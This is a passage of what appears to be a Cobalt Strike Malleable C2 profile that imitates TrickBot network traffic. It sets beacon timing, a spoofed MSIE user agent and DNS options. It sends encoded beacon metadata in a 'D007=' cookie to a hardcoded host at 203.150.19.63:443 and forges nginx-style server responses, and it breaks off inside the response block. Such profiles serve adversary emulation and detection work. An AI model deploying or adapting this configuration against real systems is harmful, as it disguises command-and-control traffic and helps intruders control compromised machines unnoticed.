#trickbot #https://community.rsa.com/community/products/netwitness/blog/2017/07/13/necurs-delivers #https://securityintelligence.com/tricks-of-the-trade-a-deeper-look-into-trickbots-machinations/ #xx0hcd set sleeptime "30000"; set jitter "20"; set useragent "Mozilla/5.0 (compatible; MSIE 8.0; Windows NT 5.1; SLCC1; .NET CLR 1.1.4322)"; set dns_idle "8.8.8.8"; set maxdns "235"; http-get { set uri "/"; client { header "Host" "203.150.19.63:443"; header "Connection" "Keep-Alive"; header "Cache-Control" "no-cache"; metadata { base64url; prepend "D007="; header "Cookie"; } } server { header "Server" "nginx"; header "Date" "Fri, 30 Jun 2017 13:08:47 GMT"; header "Content-Type" "text/html"; header "Connection" "keep-alive"; output { base64url; prepend "